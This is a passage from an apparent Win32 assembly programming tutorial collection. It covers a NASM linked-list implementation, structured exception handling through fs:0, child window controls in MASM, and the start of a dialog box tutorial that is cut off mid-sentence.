%define _ptrPrev ebp + 12
%define _ListSize ebp + 16
         ENTER 0, 0
         push edx                                ;HeapAlloc kills edx!!
         push ebx
         push ecx                                ;save registers
         mov ebx, [_ptrPrev]                     ;ebx = node to add after
         push dword [_ListSize]                  ;size of node
         push dword HEAP_ZERO_MEMORY             ;FLAG
         push dword [_hHeap]                     ;local heap
	 call HeapAlloc
	 test eax, eax
         jz .Error                               ;alloc failed!
         mov ecx, eax                            ;note -- eax = ptrNew
         add ecx, _llist.next                    ;ecx = ptrNew.next
         mov [ecx], ebx                          ;ptrNew.next = ptrPrev.next
         add ebx, _llist.next                    ;note -- ebx = ptrPrev
         mov [ebx], eax                          ;ptrPrev.next = ptrNew
.Exit:  pop ecx
         pop ebx
         pop edx
         LEAVE
         ret 12
.Error: xor eax, eax                            ;return NULL on failure
         jmp .Exit

_delete_node:
; _delete_node( hHeap, ptrPrev, ptrNode )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ptrNode ebp + 16
         ENTER 0, 0
         push ebx
         mov eax, [_ptrNode + _llist.next]       ;eax = ptrNode.next
         mov ebx, [_ptrPrev]                     ;
         mov [ebx + _llist.next], eax            ;ptrPrev.next = ptrNode.next
         push dword [_ptrNode]                   ;free ptrNode
         push dword 0                            ;FLAG
         push dword [_hHeap]                     ;local heap
         call HeapFree
         pop ebx
         LEAVE
         ret 12

_set_node_data:
; _set_node_data( ptrNode, NodeOffset, data )
%define _ptrNode ebp + 8
%define _off ebp + 12
%define _data ebp + 16
         ENTER 0, 0
         push eax
         push ebx
         mov eax, [_ptrNode]                     ;eax = ptrNode
         add eax, [ _off ]                       ;eax = ptrNode.offset
         mov ebx, [_data]                        ;ebd = data
         mov [eax], ebx                          ;ptrNode.offset = data
         pop ebx
         pop eax
         LEAVE
         ret 12

_get_node_data:
; DWORD data _get_node_data( ptrNode, NodeOffset )
%define _ptrNode ebp + 8
%define _off ebp + 12
         ENTER 0, 0
         mov eax, [_ptrNode]                     ;eax = ptrNode
         add eax, [_off]                         ;eax = ptrNode.offset
         mov eax, [eax]                          ;return [ptrNode.offset]
         LEAVE
         ret 8
;===============================================================End Linked List
The LISTSTRUCT structure is perhaps the most crucial part of this implemen-
tation. In NASM, a structure is simply a starting address with local labels
defined as constants which equal the offset of the local label from the start
of the structure. Thus, in the structure
    struc MyStruc
      .MyVar   resd 1
      .MyVar2  resd 1
      .MyVar3  resd 1
      .MyByte  resb 1
    endstruc
the constant MyStruc.MyVar has a value of 0 [0 bytes from the start of the
structure], MyStruc.MyVar2 has a value of 4, MyStruc.MyVar3 has a value of 8,
MyStruc.MyByte has a value of 12, and MyStruc_size [defined as the offset of
the "endstruc" directive] has a value of 13. Note that in NASM, the name of a
structure instance determines the address in memory of the instance [i.e., it
is a simple code label], while the constants defined in the structure
definition allow access to offsets from that address.

What this means is that structures in NASM can be defined and never instant-
iated, allowing the convenient use of the structure constants for dynamic
memory structures such as classes and linked list nodes. The above code uses
the LISTSTRUCT macro to force all linked list nodes to have a ".next" member;
this also allows the use of the constant "_llist.next" in the linked list
routines to avoid  having to pass the offset of the ".next" member for a node.

The implementation routines should be pretty straight forward. _create_list
allocates memory from the local heap of the size of one list node [determined
by the parameter NodeSize passed to _create_list] and returns the address of
the allocated memory; since this node is assumed to be the list "head", the
.next member is set to NULL. _delete_list is passed the address of the head
node of the list; it saves the address in the .next member of the node and
then frees the memory allocated to the node, repeating this with each .next
link until the .next member is NULL [indicating an end of list].

_add_node is used to insert a node into an existing list; it is passed the
address of the node after which the new node is to be inserted. The .next
member of this node is moved into the .next member of the new node, and
replaced with the address of the new node. Thus, if before insertion the list
had the structure
       .next [Node1] --> .next [Node2] --> .next [NULL]
       .data NULL        .data Node1       .data Node2
then it would have the following structure after insertion following Node1:
       .next [Node1] --> .next [NewNode] --> .next [Node2] --> .next [NULL]
       .data NULL        .data Node1         .data NewNode     .data Node2
_del_node does the opposite of _add_node; it moves the .next member of the
node to be deleted into the .next member of the preceding node, then frees the
specified node.

Note that both _del_node and _add_node are designed to be as generic as
possible and make no assumptions regarding the linked list structure; thus in
a double linked list of the format
      struc DLLIST
       .next
       .prev
       .data
      endstruc
one could front-end the Delete function as follows:
DelNode:
         push dword eax                   ;eax = Node to delete
         push dword [eax + DLLIST.prev]
         push hHeap
         call _del_node
         ret 8
The other linked list routines can be provided with similar front-ends to take
care of common heap handles, list sizes, and member assignments.

Both the _set_node_data and the _get_node_data routines are basic pointer
manipulations added for code clarity. Each could be rewritten inline; for
example, the _get_node_data routine can be implemented as
         add ebx, offset
         mov eax, [ebx]
assuming ebx holds the node to be accessed and "offset" is the offset [or
constant] of the node member to be accessed.

Below is a simple program which makes a four-node linked list of the format
         .next Node1 --> .next Node2 --> .next Node3 --> .next NULL
         .prev NULL  <-- .prev Head  <-- .prev Node1 <-- .prev Node2
         .data NULL      .data 'node1'   .data 'node2'   .data 'node3'
Note the use of the NewNode routine, which provides a front-end to _add_node
which sets the .prev member for the new node. One brief caveat, the example
does not delete the list, as the Win32 heap is deallocated on program
termination; neither is there any substantial error checking in the sample.

;=======================================================Linked List Application
[section data]
hHeap    dd 0
ptrHead  dd 0
STRING strData1, 'node 1',0Dh,0Ah
STRING strData2, 'node 2',0Dh,0Ah
STRING strData3, 'node 3',0Dh,0Ah
STRING strStart, 'Creating List',0Dh,0Ah
STRING strDone, 'Finished!',0Dh,0AH,'Printing Data...',0Dh,0Ah
STRING strErr, 'Error!',0Dh, 0AH

LISTSTRUCT llist
.prev   resd 0
.data   resd 0
END_LISTSTRUCT

[section code]
Error:
         push dword strErr.length
         push dword strErr
	 call puts
         jmp Exit

..start:
	 call GetProcessHeap
         mov [hHeap], eax
         call GetConsole

         push dword strStart.length
         push dword strStart
	 call puts

CreateList:
         push dword llist_size
         push dword [hHeap]
         call _create_list
         test eax, eax
         jz Error
         mov [ptrHead], eax
         push dword 0
         push dword llist.data
         push eax
         call _set_node_data             ;set ptrHead.data to NULL
         push dword 0
         push dword llist.prev
         push eax
         call _set_node_data             ;set ptrHead.prev to NULL

         call NewNode                    ;create Node1
         test eax, eax
         jz ListDone
         push dword strData1
         push dword llist.data
         push eax
         call _set_node_data            ;set Node1.data to 'node1'

         call NewNode                   ;create Node2
         test eax, eax
         jz ListDone
         push dword strData2
         push dword llist.data
         push eax
         call _set_node_data            ;set Node2.data to 'node2'

         call NewNode                   ;create Node3
         test eax, eax
         jz ListDone
         push dword strData3
         push dword llist.data
         push eax
         call _set_node_data            ;set Node3.data to 'node3'

ListDone:
         push dword strDone.length
         push dword strDone
         call puts

         mov ebx, [ptrHead]
PrintList:
         push dword _llist.next
         push ebx
         call _get_node_data             ;could have been mov eax,[ebx]

         test eax, eax                   ;if ptrCurrent.next == NULL exit
         jz Exit                         ; [end of list]
         mov ebx, eax                    ;save ptrNode
         push dword strData1.length      ;push length for call to puts
         push dword llist.data
         push ebx
         call _get_node_data             ;get ptrNode.data
         push dword eax                  ;push string for call to puts
         call puts
         jmp PrintList                   ;loop

Exit:
	 push dword 0
         call ExitProcess

NewNode:
         ENTER 0, 0
         push edx
         mov edx, eax                    ;save previous node
         push dword llist_size
         push dword eax
         push dword [hHeap]
         call _add_node
         test eax, eax
         jz .Done
         push dword eax
         push dword llist.next
         push dword edx
         call _set_node_data             ;set ptrPrev.next to ptrNew
         push edx
         push dword llist.prev
         push eax
         call _set_node_data             ;set ptrNew.prev to ptrPrev
         push dword 0
         push dword llist.next
         push eax
         call _set_node_data             ;set PtrNew.next to  NULL
.Done   pop edx
         LEAVE                           ;eax is still set to ptrNew
         ret
;==========================================================================EOF
As mentioned earlier, this is a generic implementation of dynamic structures
designed with linked lists in mind. The macros and routines may be included in
a header file such as llist.h and used to automate the creation of dynamic
memory structures in future projects. In addition, further macros and routines
can be added to provide specific implementations of Single Linked Lists,
Double Linked Lists, Circular Lists, Stacks, Queues, and Deques.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                      Structured Exception Handling under Win32
				      by Chris Dragan


    Structured Exception  Handling is a powerful feature of all Win32 platforms
that allows  a program to recover from any  critical errors like BOUND, divide
overflow, page missing or general protection fault. It is documented  only for
C-level usage (try-except/finally  syntax), and no documentation for low level
languages exists. Therefore I will try to show how to use it.

    The starting point  for Structured Exception Handling,  SEH,  is the Thread
Info Block. TIB, as  almost all the other structures, is described  in winnt.h
file that comes with PlatformSDK.

struc NT_TIB
	 ExceptionList  dd ? ; Used by SEH
	 StackBase  dd ? ; Used by functions to check for
	 StackLimit  dd ? ;  stack overflow
	 SubSystemTib  dd ? ; ?
	 FiberDataOrVersion dd ? ; ?
	 ArbitraryUserPointer dd ? ; ?
	 Self 	 dd ? ; Linear address of the TIB
ends

TIB is accessible at address fs:0. NT_TIB.Self contains linear address of TIB,
base of FS segment.

    When an exception occurs, the system uses (dword)fs:0, NT_TIB.ExceptionList
to find an exception handler and execute it. The exception  list entry is very
simple:

struc E_L_ENTRY
	 Next 	 dd ? ; Points to next entry in the list
	 ExceptionHandler dd ? ; User callback - exception hook
	 Optional  db X dup (?) ; Exception Handler data
	 EntryTerminator  dd -1 ; Optional
ends

C compilers  usually keep  some additional  information  in E_L_ENTRY.Optional
field of varying size  and usually terminated  with (dword)-1. Both .Optional
and .EntryTerminator fields are not required.

    Before  calling   an  exception   handler,  the  exception  manager pushes
ExceptionRecord and ContextRecord onto the stack. These structures identify an
exception and  processor state before it. The exception manager  adds also its
own entry to the exception list.

    Exception  handler  is  in  fact  a typical callback. It  is  not  however
installed  by any API function, but appended  in E_L_ENTRY into  the exception
list.

EXCEPTION_DISPOSITION __cdecl _except_handler (
     struct _EXCEPTION_RECORD *ExceptionRecord,
     void * EstablisherFrame,
     struct _CONTEXT *ContextRecord,
     void * DispatcherContext
     );

The exception  handler uses C-style  calling convention, it  does not  release
arguments while returning. The most important parameters  are ExceptionRecord
and ContextRecord, described at the end of this text, that point to the pushed
corresponding  structures. I do not  have yet any  idea what is the purpose of
EstablisherFrame and DispatcherContext.

struc EXCEPTION_RECORD
	 ExceptionCode  dd ? ; See at the end of this text
	 ExceptionFlags  dd ?
	 ExceptionRecord  dd ? ; ?
	 ExceptionAddress dd ? ; Linear address of faulty instruction
	 NumberParameters dd ? ; Corresponds to the field below
	 ExceptionInformation dd 15 dup (?) ; ?
ends

Exception flags are:

EXCEPTION_NONCONTINUABLE = 1
EXCEPTION_UNWINDING  = 2
EXCEPTION_UNWINDING_FOR_EXIT = 4

    The exception handler has two possible ways of proceeding. It can return to
the exception manager, or it can unwind the stack and continue the program. In
the first case it has to return one of the following values:

enum EXCEPTION_DISPOSITION \
	 ExceptionContinueExecution  = 0,\
	 ExceptionContinueSearch     = 1,\
	 ExceptionNestedException    = 2,\
	 ExceptionCollidedUnwind     = 3

The  value  of zero  forces  the exception  manager  to continue  the program
at saved in context cs:eip, which may be altered by the exception handler. The
value of 1 causes  the exception manager to call another exception handler  in
the exception list. Values 2 and 3 inform  the exception manager that an error
occured - an exception-in-exception happened, or the handler  wanted to unwind
the stack  during another handler of higher  instance was  doing this already.
The   other  case   can   be   determined   if  one   of  .ExceptionFlags  is
EXCEPTION_UNWINDING or EXCEPTION_UNWINDING_FOR_EXIT.

    While  appending  a new exception handler  to  the exception list, a common
practice is to push new E_L_ENTRY onto the stack. This way unwinding the stack
can be done simply by skipping the exception manager's entry and restoring the
stack pointer.

Here is an example of exception handling.

----Start-of-file-------------------------------------------------------------

ideal
p686n
model flat, stdcall

   O equ <offset>

   struc EXCEPTION_RECORD
	 ExceptionCode  dd ?
	 ExceptionFlags  dd ?
	 ExceptionRecord  dd ?
	 ExceptionAddress dd ?
	 NumberParameters dd ?
	 ExceptionInformation dd 15 dup (?)
   ends

   procdesc wsprintfA c :dword, :dword, :dword:?
   procdesc MessageBoxA :dword, :dword, :dword, :dword
   procdesc ExitProcess :dword

udataseg

   ExCode dd ?
   szCode db 12 dup (?)

dataseg

   szWindowTitle db 'Exception code', 0
   szFormat db '%0X', 0

codeseg

proc main
		 ; Install exception handler
			 push O ExceptionHandler
			 push [dword fs:0] ; E_L_ENTRY.Next
			 mov [fs:0], esp ; Append new E_L_ENTRY

		 ; Cause Invalid Opcode exception
			 ud2

		 ; Display exception code and quit
_Continue:  call wsprintfA, O szCode, O szFormat, [ExCode]
			 call MessageBoxA, 0, O szCode, O szWindowTitle, 0
			 call ExitProcess, 0
endp

proc ExceptionHandler c ExceptionRecord, EF, ContextRecord, DC
		 ; Save exception code
			 mov eax, [ExceptionRecord]
			 mov ecx, [(EXCEPTION_RECORD eax).ExceptionCode]
			 mov [ExCode], ecx

		 ; Unwind the stack
			 mov eax, [fs:0] ; Exception Manager's entry
			 mov esp, [eax] ; Our entry
			 pop [dword fs:0] ; Restore fs:0
			 add esp, 4  ; Skip ExHandler address
			 jmp _Continue
endp

end main

----End-of-file---------------------------------------------------------------

The above source should be compiled with TASM 5.0r or later like this:
   tasm32 /ml except.asm
   tlink32 /x /Tpe /aa /c /V4.0 except.obj,,, LIBPATH\import32.lib

    And here  are other important  constants  and  structures, all  defined in
winnt.h PlatformSDK file.

Exception codes:
----------------

STATUS_SEGMENT_NOTIFICATION = 040000005h
STATUS_GUARD_PAGE_VIOLATION = 080000001h
STATUS_DATATYPE_MISALIGNMENT = 080000002h
STATUS_BREAKPOINT  = 080000003h
STATUS_SINGLE_STEP  = 080000004h
STATUS_ACCESS_VIOLATION  = 0C0000005h
STATUS_IN_PAGE_ERROR  = 0C0000006h
STATUS_INVALID_HANDLE  = 0C0000008h
STATUS_NO_MEMORY  = 0C0000017h
STATUS_ILLEGAL_INSTRUCTION = 0C000001Dh
STATUS_NONCONTINUABLE_EXCEPTION = 0C0000025h
STATUS_INVALID_DISPOSITION = 0C0000026h
STATUS_ARRAY_BOUNDS_EXCEEDED = 0C000008Ch
STATUS_FLOAT_DENORMAL_OPERAND = 0C000008Dh
STATUS_FLOAT_DIVIDE_BY_ZERO = 0C000008Eh
STATUS_FLOAT_INEXACT_RESULT = 0C000008Fh
STATUS_FLOAT_INVALID_OPERATION = 0C0000090h
STATUS_FLOAT_OVERFLOW  = 0C0000091h
STATUS_FLOAT_STACK_CHECK = 0C0000092h
STATUS_FLOAT_UNDERFLOW  = 0C0000093h
STATUS_INTEGER_DIVIDE_BY_ZERO = 0C0000094h
STATUS_INTEGER_OVERFLOW  = 0C0000095h
STATUS_PRIVILEGED_INSTRUCTION = 0C0000096h
STATUS_STACK_OVERFLOW  = 0C00000FDh
STATUS_CONTROL_C_EXIT  = 0C000013Ah
STATUS_FLOAT_MULTIPLE_FAULTS = 0C00002B4h
STATUS_FLOAT_MULTIPLE_TRAPS = 0C00002B5h
STATUS_ILLEGAL_VLM_REFERENCE = 0C00002C0h

Context flags:
--------------

CONTEXT_i386 	 = 000010000h
CONTEXT_i486 	 = 000010000h

CONTEXT_CONTROL 	   = (CONTEXT_i386 or 1) ; SS:ESP, CS:EIP, EFLAGS, EBP
CONTEXT_INTEGER 	   = (CONTEXT_i386 or 2) ; EAX, EBX,..., ESI, EDI
CONTEXT_SEGMENTS    = (CONTEXT_i386 or 4) ; DS, ES, FS, GS
CONTEXT_FLOATING_POINT    = (CONTEXT_i386 or 8) ; 387 state
CONTEXT_DEBUG_REGISTERS    = (CONTEXT_i386 or 16); DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = (CONTEXT_i386 or 32); cpu specific extensions

CONTEXT_FULL 	   = (CONTEXT_CONTROL or CONTEXT_INTEGER or\
			       CONTEXT_SEGMENTS)

Context structure:
------------------

struc CONTEXT
	 ContextFlags  dd ?  ; CONTEXT_??? flags

	 Dr0 	 dd ?  ; Debug registers
	 Dr1 	 dd ?
	 Dr2 	 dd ?
	 Dr3 	 dd ?
	 Dr6 	 dd ?
	 Dr7 	 dd ?

	 ControlWord  dd ?  ; FPU context
	 StatusWord  dd ?
	 TagWord 	 dd ?
	 ErrorOffset  dd ?
	 ErrorSelector  dd ?
	 DataOffset  dd ?
	 DataSelector  dd ?
	 RegisterArea  dt 8 dup (?)
	 Cr0NpxState  dd ?

	 SegGs 	 dd ?  ; Segment registers
	 SegFs 	 dd ?
	 SegEs 	 dd ?
	 SegDs 	 dd ?

	 Edi 	 dd ?  ; Integer registers
	 Esi 	 dd ?
	 Ebx 	 dd ?
	 Edx 	 dd ?
	 Ecx 	 dd ?
	 Eax 	 dd ?

	 Ebp 	 dd ?  ; Control registers
	 Eip 	 dd ?
	 SegCs 	 dd ?
	 EFlags 	 dd ?
	 Esp 	 dd ?
	 SegSs 	 dd ?

	 ExtendedRegisters db 512 dup (?)
ends

Additional word
---------------
This article was posted on comp.lang.asm.x86.
Especially thanks to Michael Tippach for pointing out some exception flags.
My web page is at http://ams.ampr.org/cdragan/



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                           Child Window Controls
                                                           by Iczelion


In this tutorial, we will explore child window controls which are very
important input and output devices of our programs.

Theory
------
Windows provides several predefined window classes which we can readily use
in our own programs. Most of the time we use them as components of a dialog
box so they're usually called child window controls. The child window
controls process their own mouse and keyboard messages and notify the
parent window when their states have changed. They relieve the burden from
programmers enormously so you should use them as much as possible. In this
tutorial, I put them on a normal window just to demonstrate how you can
create and use them but in reality you should put them in a dialog box.
Examples of predefined window classes are button, listbox, checkbox, radio
button,edit etc.

In order to use a child window control, you must create it with
CreateWindow or CreateWindowEx. Note that you don't have to register the
window class since it's registered for you by Windows. The class name
parameter MUST be the predefined class name. Say, if you want to create a
button, you must specify "button" as the class name in CreateWindowEx. The
other parameters you must fill in are the parent window handle and the
control ID. The control ID must be unique among the controls. The control
ID is the ID of that control. You use it to differentiate between the
controls.

After the control was created, it will send messages notifying the parent
window when its state has changed. Normally, you create the child windows
during WM_CREATE message of the parent window. The child window sends
WM_COMMAND messages to the parent window with its control ID in the low
word of wParam,  the notification code in the high word of wParam, and its
window handle in lParam. Each child window control has different
notification codes, refer to your Win32 API reference for more information.


The parent window can send commands to the child windows too, by calling
SendMessage function. SendMessage function sends the specified message with
accompanying values in wParam and lParam to the window specified by the
window handle. It's an extremely useful function since it can send messages
to any window provided you know its window handle.
So, after creating the child windows, the parent window must process
WM_COMMAND messages to be able to receive notification codes from the child
windows.

Application
-----------
We will create a window which contains an edit control and a pushbutton.
When you click the button, a message box will appear showing the text you
typed in the edit box. There is also a menu with 4 menu items:

   1. Say Hello  -- Put a text string into the edit box
   2. Clear Edit Box -- Clear the content of the edit box
   3. Get Text -- Display a message box with the text in the edit box
   4. Exit -- Close the program.

.386
.model flat,stdcall
option casemap:none

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
ClassName db "SimpleWinClass",0
AppName  db "Our First Window",0
MenuName db "FirstMenu",0
ButtonClassName db "button",0
ButtonText db "My First Button",0
EditClassName db "edit",0
TestString db "Wow! I'm in an edit box now",0

.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
hwndButton HWND ?
hwndEdit HWND ?
buffer db 512 dup(?)                    ; buffer to store the text
retrieved from the edit box

.const
ButtonID equ 1                                ; The control ID of the
button control
EditID equ 2                                    ; The control ID of the
edit control
IDM_HELLO equ 1
IDM_CLEAR equ 2
IDM_GETTEXT equ 3
IDM_EXIT equ 4

.code
start:
     invoke GetModuleHandle, NULL
     mov    hInstance,eax
     invoke GetCommandLine
     invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
     invoke ExitProcess,eax

WinMain proc
hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
     LOCAL wc:WNDCLASSEX
     LOCAL msg:MSG
     LOCAL hwnd:HWND
     mov   wc.cbSize,SIZEOF WNDCLASSEX
     mov   wc.style, CS_HREDRAW or CS_VREDRAW
     mov   wc.lpfnWndProc, OFFSET WndProc
     mov   wc.cbClsExtra,NULL
     mov   wc.cbWndExtra,NULL
     push  hInst
     pop   wc.hInstance
     mov   wc.hbrBackground,COLOR_BTNFACE+1
     mov   wc.lpszMenuName,OFFSET MenuName
     mov   wc.lpszClassName,OFFSET ClassName
     invoke LoadIcon,NULL,IDI_APPLICATION
     mov   wc.hIcon,eax
     mov   wc.hIconSm,eax
     invoke LoadCursor,NULL,IDC_ARROW
     mov   wc.hCursor,eax
     invoke RegisterClassEx, addr wc
     invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR ClassName, \
                         ADDR AppName, WS_OVERLAPPEDWINDOW,\
                         CW_USEDEFAULT, CW_USEDEFAULT,\
                         300,200,NULL,NULL, hInst,NULL
     mov   hwnd,eax
     invoke ShowWindow, hwnd,SW_SHOWNORMAL
     invoke UpdateWindow, hwnd
     .WHILE TRUE
         invoke GetMessage, ADDR msg,NULL,0,0
         .BREAK .IF (!eax)
         invoke TranslateMessage, ADDR msg
         invoke DispatchMessage, ADDR msg
     .ENDW
     mov     eax,msg.wParam
     ret
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
     .IF uMsg==WM_DESTROY
         invoke PostQuitMessage,NULL
     .ELSEIF uMsg==WM_CREATE
         invoke CreateWindowEx,WS_EX_CLIENTEDGE, ADDR EditClassName,NULL,\
                         WS_CHILD or WS_VISIBLE or WS_BORDER or ES_LEFT or\
                         ES_AUTOHSCROLL,\
                         50,35,200,25,hWnd,8,hInstance,NULL
         mov  hwndEdit,eax
         invoke SetFocus, hwndEdit
         invoke CreateWindowEx,NULL, ADDR ButtonClassName,ADDR ButtonText,\
                         WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
                         75,70,140,25,hWnd,ButtonID,hInstance,NULL
         mov  hwndButton,eax
     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0
             .IF ax==IDM_HELLO
                 invoke SetWindowText,hwndEdit,ADDR TestString
             .ELSEIF ax==IDM_CLEAR
                 invoke SetWindowText,hwndEdit,NULL
             .ELSEIF  ax==IDM_GETTEXT
                 invoke GetWindowText,hwndEdit,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
             .ELSE
                 invoke DestroyWindow,hWnd
             .ENDIF
         .ELSE
             .IF ax==ButtonID
                 shr eax,16
                 .IF ax==BN_CLICKED
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
                 .ENDIF
             .ENDIF
         .ENDIF
     .ELSE
         invoke DefWindowProc,hWnd,uMsg,wParam,lParam
         ret
     .ENDIF
      xor    eax,eax
     ret
WndProc endp
end start

Analysis:

Let's analyze the program.

          .ELSEIF uMsg==WM_CREATE
              invoke CreateWindowEx,WS_EX_CLIENTEDGE, \
                              ADDR EditClassName,NULL,\
                              WS_CHILD or WS_VISIBLE or WS_BORDER or
      ES_LEFT\
                              or ES_AUTOHSCROLL,\
                              50,35,200,25,hWnd,EditID,hInstance,NULL
              mov  hwndEdit,eax
              invoke SetFocus, hwndEdit
              invoke CreateWindowEx,NULL, ADDR ButtonClassName,\
                              ADDR ButtonText,\
                              WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
                              75,70,140,25,hWnd,ButtonID,hInstance,NULL
              mov  hwndButton,eax

We create the controls during processing of WM_CREATE message. We call
CreateWindowEx with an extra window style, WS_EX_CLIENTEDGE, which makes
the client area look sunken. The name of each control is a predefined one,
"edit" for edit control, "button" for button control. Next we specify the
child window's styles. Each control has extra styles in addition to the
normal window styles. For example, the button styles are prefixed with
"BS_" for "button style", edit styles are prefixed with "ES_" for "edit
style". You have to look these styles up in a Win32 API reference. Note
that you put a control ID in place of the menu handle. This doesn't cause
any harm since a child window control cannot have a menu.

After creating each control, we keep its handle in a variable for future
use.

SetFocus is called to give input focus to the edit box so the user can type
the text into it immediately.

Now comes the really exciting part. Every child window control sends
notification to its parent window with WM_COMMAND.

     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0

Recall that a menu also sends WM_COMMAND messages to notify the window
about its state too. How can you differentiate between WM_COMMAND messages
originated from a menu or a control? Below is the answer

          Low word of wParam   High word of wParam    lParam
  Menu    Menu ID              0                      0
  Control Control ID           Notification code      Child Window Handle

You can see that you should check lParam. If it's zero, the current
WM_COMMAND message is from a menu. You cannot use wParam to differentiate
between a menu and a control since the menu ID and control ID may be
identical and the notification code may be zero.

             .IF ax==IDM_HELLO
                 invoke SetWindowText,hwndEdit,ADDR TestString
             .ELSEIF ax==IDM_CLEAR
                 invoke SetWindowText,hwndEdit,NULL
             .ELSEIF  ax==IDM_GETTEXT
                 invoke GetWindowText,hwndEdit,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK


You can put a text string into an edit box by calling SetWindowText. You
clear the content of an edit box by calling SetWindowText with NULL.
SetWindowText is a general purpose API function. You can use SetWindowText
to change the caption of a window or the text on a button.
To get the text in an edit box, you use GetWindowText.

             .IF ax==ButtonID
                 shr eax,16
                 .IF ax==BN_CLICKED
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
                 .ENDIF
             .ENDIF

The above code snippet deals with the condition when the user presses the
button. First, it checks the low word of wParam to see if the control ID
matches that of the button. If it is, it checks the high word of wParam to
see if it is the notification code BN_CLICKED which is sent when the button
is clicked.

The interesting part is after it's certain that the notification code is
BN_CLICKED. We want to get the text from the edit box and display it in a
message box. We can duplicate the code in the IDM_GETTEXT section above but
it doesn't make sense. If we can somehow send a WM_COMMAND message with the
low word of wParam containing the value IDM_GETTEXT to our own window
procedure, we can avoid code duplication and simplify our program.

SendMessage function is the answer. This function sends any message to any
window with any wParam and lParam we want. So instead of duplicating the
code, we call SendMessage with the parent window handle, WM_COMMAND,
IDM_GETTEXT, and 0. This has identical effect to selecting "Get Text" menu
item from the menu. The window procedure doesn't perceive any difference
between the two.

You should use this technique as much as possible to make your code more
organized.

Last but not least, do not forget the TranslateMessage function in the
message loop. Since you must type in some text into the edit box, your
program must translate raw keyboard input into readable text. If you omit
this function, you will not be able to type anything into your edit box.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                       Dialog Box as Main Window
                                                       by Iczelion


Now comes the really interesting part about GUI, the dialog box. In this
tutorial (and the next), we will learn how to use a dialog box as our main
window.

Theory
------
If you play with the examples in the previous tutorial long enough, you 'll
find out that you cannot change input focus from one child window control
to another with Tab key. The only way you can do that is by clicking the
control you want it to gain input focus. This situation is rather
cumbersome. Another thing you might notice is that I changed the background
color of the parent window to gray instead of normal white as in previous
examples. This is done so that the color of the child window controls can
blend seamlessly with the color of the client area of the parent window.
There is a way to get around this problem but it's not easy. You have to
subclass all child window controls in your parent window.

The reason why such inconvenience exists is that child window controls are
originally designed to work with a dialog box, not a normal window. The
default color of child window controls such as a button is gray because the
client area of a dialog box is normally gray so they blend into each other
without any sweat on the programmer's part.

Before we get deep into the detail, we should know first what a dialog box
is. A dialog box is nothing more than a normal window which is designed to
work with child window controls. Windows also provides internal "dialog box
manager" which is responsible for most of the keyboard logic such as
shifting input focus when the user presses Tab, pressing the default
pushbutton if Enter key is pressed, etc so programmers can deal with higher
level tasks. Dialog boxes are primarily used as input/output devices. As
such a dialog box can be considered as an input/output "black box" meaning
that you don't have to know how a dialog box works internally in order to
be able to use it, you only have to know how to interact with it. That's a
principle of object oriented programming (OOP) called information hiding.
If the black box is *perfectly* designed, the user can make use of it
without any knowledge on how it operates. The catch is that the black box
must be perfect, that's hard to achieve in the real world. Win32 API is
also designed as a black box too.

Well, it seems we stray from our path. Let's get back to our subject.
Dialog boxes are designed to reduce workload of a programmer. Normally if
you put child window controls on a normal window, you have to subclass them
and write keyboard logic yourself. But if you put them on a dialog box, it
will handle the logic for you. You only have to know how to get the user
input from the dialog box or how to send commands to it.

A dialog box is defined as a resource much the same way as a menu. You
write a dialog box template describing the characteristics of the dialog
box and its controls and then compile the resource script with a resource
editor.

Note that all resources are put together in the same resource script file.
You can use any text editor to write a dialog box template but I don't
recommend it. You should use a resource editor to do the job visually since
arranging child window controls on a dialog box is hard to do manually.
Several excellent resource editors are available. Most of the major
compiler suites include their own resource editors. You can use them to
create a resource script for your program and then cut out irrelevant lines
such as those related to MFC.

There are two main types of dialog box: modal and modeless. A modeless
dialog box lets you change input focus to other window. The example is the
Find dialog of MS Word. There are two subtypes of modal dialog box:
application modal and system modal. An application modal dialog box doesn't
let you change input focus to other window in the same application but you
can change the input focus to the window of OTHER application. A system
modal dialog box doesn't allow you to change input focus to any other
window until you respond to it first.

A modeless dialog box is created by calling CreateDialogParam API function.
A modal dialog box is created by calling DialogBoxParam. The only
distinction between an application modal dialog box and a system modal one
is the DS_SYSMODAL style. If you include DS_SYSMODAL style in a dialog box
template, that dialog box will be a system modal one.

You can communicate with any child window control on a dialog box by using
SendDlgItemMessage function. Its syntax is like this:


      SendDlgItemMessage proto hwndDlg:DWORD,\
                               idControl:DWORD,\
                               uMsg:DWORD,\
                               wParam:DWORD,\
                               lParam:DWORD


This API call is immensely useful for interacting with a child window
control. For example, if you want to get the text from an edit control, you
can do this:

      call SendDlgItemMessage, hDlg, ID_EDITBOX, WM_GETTEXT, 256, ADDR
      text_buffer

In order to know which message to send, you should consult your Win32 API
reference.

Windows also provides several control-specific API functions to get and set
data quickly, for example, GetDlgItemText, CheckDlgButton etc. These
